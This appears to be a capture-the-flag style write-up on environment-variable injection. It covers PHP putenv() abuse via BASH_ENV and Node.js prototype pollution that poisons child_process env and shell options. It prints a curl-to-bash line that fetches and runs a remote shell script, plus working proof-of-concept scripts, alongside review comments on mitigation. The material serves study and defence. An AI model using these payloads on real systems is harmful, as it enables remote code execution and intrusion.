由一篇文章和一道题目引发的对于环境变量的探索
// prototype pollution
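app.get('/admin', (req, res) => {
  // Admin gate. Require `username` to be an OWN property of `object`:
  // a lookup that falls through to Object.prototype would otherwise pass
  // this check with a value that prototype pollution planted there.
  if (Object.hasOwn(object, 'username') && manage.get(object, 'username', 'guest') === 'admin') {
    console.log('Current User:' + object.username);
    // Give the child an explicit own `env`. With no own property, the
    // environment is read through the options object's prototype chain,
    // which is where a polluted `env` (e.g. one carrying NODE_OPTIONS) lives.
    const child = proc.fork(`${__dirname}/public/user.js`, ['admin'], { env: { ...process.env } });
    let replied = false; // res.send() may only answer the request once
    child.on('message', (body) => {
      if (replied) return;
      replied = true;
      res.status(200).send(body);
    });
    child.on('error', (err) => {
      // An 'error' event with no listener is thrown out of the handler;
      // fail the request cleanly instead.
      console.error(`subprocess error: ${err.message}`);
      if (!replied) {
        replied = true;
        res.status(500).send('Internal Server Error');
      }
    });
    child.on('close', (code, signal) => {
      console.log(`subproccess ended with ${signal}`);
    });
  } else {
    res.status(403).send('Only Admin Can View this');
  }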
})if (isset($_GET['p'])) { foreach ($_GET['p'] as $p) { putenv($p); } }
// NOTE(review): putenv() on raw request values lets the client define any
// environment variable for this process and for every program system()
// spawns below (bash-style shells read configuration from the environment).
// Mitigation: allow-list the variable names, or drop putenv() entirely.
if (file_exists($_GET['file'])) {
// escapeshellarg() only neutralises the argument text; it does not make the
// command path trustworthy and does nothing about the environment set above.
var_dump(escapeshellarg($_GET['file']) . " 2>&1");
system(escapeshellarg($_GET['file']) . " 2>&1");
}/bin/bash -c 'ls' 不好
BASH_ENV=`curl shell.now.sh | bash` /bin/bash 好
// prototype pollution
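app.get('/admin', (req, res) => {
  // Admin gate. Require `username` to be an OWN property of `object`:
  // a lookup that falls through to Object.prototype would otherwise pass
  // this check with a value that prototype pollution planted there.
  if (Object.hasOwn(object, 'username') && manage.get(object, 'username', 'guest') === 'admin') {
    console.log('Current User:' + object.username);
    // Give the child an explicit own `env`. With no own property, the
    // environment is read through the options object's prototype chain,
    // which is where a polluted `env` (e.g. one carrying NODE_OPTIONS) lives.
    const child = proc.fork(`${__dirname}/public/user.js`, ['admin'], { env: { ...process.env } });
    let replied = false; // res.send() may only answer the request once
    child.on('message', (body) => {
      if (replied) return;
      replied = true;
      res.status(200).send(body);
    });
    child.on('error', (err) => {
      // An 'error' event with no listener is thrown out of the handler;
      // fail the request cleanly instead.
      console.error(`subprocess error: ${err.message}`);
      if (!replied) {
        replied = true;
        res.status(500).send('Internal Server Error');
      }
    });
    child.on('close', (code, signal) => {
      console.log(`subproccess ended with ${signal}`);
    });
  } else {
    res.status(403).send('Only Admin Can View this');
  }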
})const child_process = require('child_process');
// NOTE(review): PoC for the write-up. Once Object.prototype carries an `env`
// property, a child_process call made without an own `env` option resolves
// it through the prototype chain and uses it as the child's entire
// environment; the child spawned below is `node` itself.
// Mitigation: pass an explicit own `env` to every spawn/exec/fork call, or
// freeze Object.prototype at startup. Detection: alert on NODE_OPTIONS
// appearing in the environment of child node processes.
Object.prototype.env = {
NODE_DEBUG : '1; throw require("child_process").execSync("sleep 7").toString()//',
NODE_OPTIONS : '-r /proc/self/environ'
};
// No options object is passed, so every option is read through the prototype.
child_process.execSync('node');Step1: child_process.js
Step2: spawn_sync.cc & another
Step3: libuv/src/unix/process.c & another
Step4: NodeJS cli
const child_process = require('child_process');
// NOTE(review): variant of the PoC above. The `shell` option is resolved the
// same way as `env`: with no own property on the options object the lookup
// reaches Object.prototype, so the polluted value decides which program runs
// the command string, and the polluted `env` decides its environment.
// The mitigation is the same: explicit own options (or a frozen
// Object.prototype) before any child_process call.
Object.prototype.shell = "node";
Object.prototype.env = {
NODE_DEBUG : '1; throw require("child_process").execSync("sleep 7").toString()//',
NODE_OPTIONS : '-r /proc/self/environ'
};
// The command text itself is irrelevant here; the options control the outcome.
child_process.execSync('id');About 'shell' here
With prototype pollution
We can almost do anything!